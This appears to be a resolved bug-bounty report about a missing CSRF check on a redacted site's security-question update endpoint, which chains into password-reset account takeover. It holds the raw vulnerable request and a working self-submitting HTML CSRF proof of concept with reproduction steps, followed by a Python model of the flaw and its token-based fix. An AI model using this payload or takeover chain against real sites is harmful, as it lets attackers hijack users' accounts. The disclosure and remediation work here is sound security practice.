CSRF Attack on changing security questions leads to full Account TakeOver
High
Vulnerability Details
**Description:**
Hi,
While researching https://www.████/, I discovered that an attacker could exploit a CSRF vulnerability to perform a password reset and gain full control of any user's account.
There is a feature in the user profile that allows users to change their security questions and answers. However, when the user changes this information, the application does not verify the CSRF token, resulting in a CSRF vulnerability in that functionality.
Additionally, the password-reset flow lets users change their password by answering their security questions. Exploiting the vulnerability described above therefore bypasses that check and results in a 1-click account takeover.
### Vulnerable Request
```
POST /member/updatesecurityquestions HTTP/2
Host: www.███████
Cookie: {YOUR-COOKIE}
Content-Length: 170
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://www.██████████
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://www.██████/member/updatesecurityquestions
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

security_questions1=1&security_question_answer1=temp&security_questions2=2&security_question_answer2=temp&security_questions3=3&security_question_answer3=temp&submit=Save
```
## References
**Video PoC**
███████
## Impact
1 - CSRF Vulnerability on Changing Security Questions/Answers
2 - Account Takeover
## System Host(s)
www.█████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
1 - Create an Account on : `https://www.███/`
2 - Navigate to : `https://www.█████████/member/updatesecurityquestions` and update Security questions
3 - Intercept the request and create a CSRF PoC, or use the one below:
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://www.█████████/member/updatesecurityquestions" method="POST">
<input type="hidden" name="security_questions1" value="1" />
<input type="hidden" name="security_question_answer1" value="hacked" />
<input type="hidden" name="security_questions2" value="2" />
<input type="hidden" name="security_question_answer2" value="hacked" />
<input type="hidden" name="security_questions3" value="3" />
<input type="hidden" name="security_question_answer3" value="hacked" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
4 - Open it in the browser and observe that the security questions have been changed.
5 - Now open a separate private window, go to `https://www.██████/forgotpassword/?redirect_to=%2Fmember%2Foptions%2Fcurrenttab%2Femail`, and observe the option **On Screen Reset**.
6 - Since the attacker now knows the victim's security questions and answers, entering the correct answers lets them change the victim's password.
## Suggested Mitigation/Remediation Actions
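As an added example (not code from the report or from the affected site), the following Python model places the behaviour described in the Description section next to its fix: one handler applies the security-question form without any CSRF check, and a hardened one requires a session-bound synchronizer token plus an Origin/Referer check before applying it. The host, the `Session` and `Request` classes and the `attacker.example` origin are stand-ins assumed for the example; the form field names are the ones from the vulnerable request above.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Placeholder for the redacted host in the report (assumed value).
SITE_ORIGIN = "https://www.example.com"


@dataclass
class Session:
    """Server-side session: the anti-CSRF token is stored here, bound to the user."""
    user_id: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    security_answers: dict = field(default_factory=dict)


@dataclass
class Request:
    """Minimal stand-in for an HTTP POST: headers, urlencoded body, resolved session."""
    headers: dict
    body: str
    session: Session


def render_security_questions_form(session: Session) -> str:
    """The legitimate page embeds the session-bound token as a hidden field
    (synchronizer token pattern); a cross-site page cannot read this value."""
    return (
        f'<form action="{SITE_ORIGIN}/member/updatesecurityquestions" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}" />'
        "<!-- security question fields omitted --></form>"
    )


def _apply(session: Session, fields: dict) -> None:
    # Persist question id -> answer for the three slots the form submits.
    for i in (1, 2, 3):
        question = fields.get(f"security_questions{i}", [None])[0]
        answer = fields.get(f"security_question_answer{i}", [None])[0]
        if question and answer:
            session.security_answers[question] = answer


def update_security_questions_vulnerable(req: Request) -> int:
    """Behaviour described in the report: any authenticated POST is applied, no CSRF check."""
    _apply(req.session, parse_qs(req.body))
    return 200


def _same_origin(req: Request) -> bool:
    # Defence in depth: a cross-site form post carries the attacker's Origin (or a foreign Referer).
    origin = req.headers.get("Origin") or req.headers.get("Referer") or ""
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def update_security_questions_fixed(req: Request) -> int:
    """Hardened handler: reject unless Origin/Referer is ours AND the synchronizer token matches."""
    if not _same_origin(req):
        return 403
    fields = parse_qs(req.body)
    submitted = fields.get("csrf_token", [""])[0]
    # Constant-time comparison on bytes; a missing or guessed token fails here.
    if not hmac.compare_digest(submitted.encode(), req.session.csrf_token.encode()):
        return 403
    _apply(req.session, fields)
    return 200


def demo() -> dict:
    # Constructed body mirroring the report's PoC form: no token, every answer set to "hacked".
    poc_body = (
        "security_questions1=1&security_question_answer1=hacked"
        "&security_questions2=2&security_question_answer2=hacked"
        "&security_questions3=3&security_question_answer3=hacked&submit=Save"
    )
    attacker_headers = {"Origin": "https://attacker.example"}  # constructed foreign origin

    # 1. Vulnerable handler: the cross-site post silently overwrites the victim's answers.
    victim_old = Session("victim")
    vuln_status = update_security_questions_vulnerable(Request(attacker_headers, poc_body, victim_old))

    # 2. Fixed handler: the same cross-site post is refused and the answers stay untouched.
    victim_new = Session("victim")
    fixed_cross = update_security_questions_fixed(Request(attacker_headers, poc_body, victim_new))

    # 3. Fixed handler: correct Origin but a guessed token is still refused.
    bad_token_body = "csrf_token=guess&security_questions1=1&security_question_answer1=x"
    fixed_bad_token = update_security_questions_fixed(Request({"Origin": SITE_ORIGIN}, bad_token_body, victim_new))

    # 4. Fixed handler: the user's own submission, carrying the token from the rendered page, succeeds.
    legit_body = f"csrf_token={victim_new.csrf_token}&security_questions1=1&security_question_answer1=blue&submit=Save"
    fixed_same = update_security_questions_fixed(Request({"Origin": SITE_ORIGIN}, legit_body, victim_new))

    return {
        "vulnerable_cross_site": vuln_status,
        "vulnerable_answers": dict(victim_old.security_answers),
        "fixed_cross_site": fixed_cross,
        "fixed_bad_token": fixed_bad_token,
        "fixed_same_site": fixed_same,
        "fixed_answers": dict(victim_new.security_answers),
    }


if __name__ == "__main__":
    print(demo())
```

Running the file prints the status codes and the resulting answer sets for each case. The token check is the primary control; the Origin/Referer check is defence in depth, since some clients omit `Origin`, so the handler falls back to `Referer` and treats a request with neither as cross-site. Because security questions are account-recovery credentials, changing them should additionally require the current password, which removes the value of a forged request even if a CSRF control ever regresses.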
## Report Stats
- Report ID: 2652603
- State: Closed
- Substate: resolved